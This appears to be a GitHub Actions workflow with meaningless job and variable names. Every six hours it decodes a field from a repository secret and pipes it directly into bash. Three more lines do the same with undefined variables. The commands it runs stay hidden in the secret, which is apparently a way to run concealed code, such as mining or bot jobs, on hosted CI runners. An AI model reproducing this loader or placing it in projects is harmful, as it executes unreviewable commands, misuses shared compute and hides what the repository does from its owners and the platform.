name: kongxianqi3178
on:
  workflow_dispatch:
  schedule:
    - cron: '49 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kongxianqi3178
        env:
          okse19293: ${{ secrets.okse19293 }}
        run: |
          echo $okse19293 | jq -r .wbot7070 | /bin/bash
          echo $zeidr983 | jq -r .unora898 | /bin/bash
          echo $bie16 | jq -r .ct813 | /bin/bash
          echo $nnvk789 | jq -r .ebba5 | /bin/bash

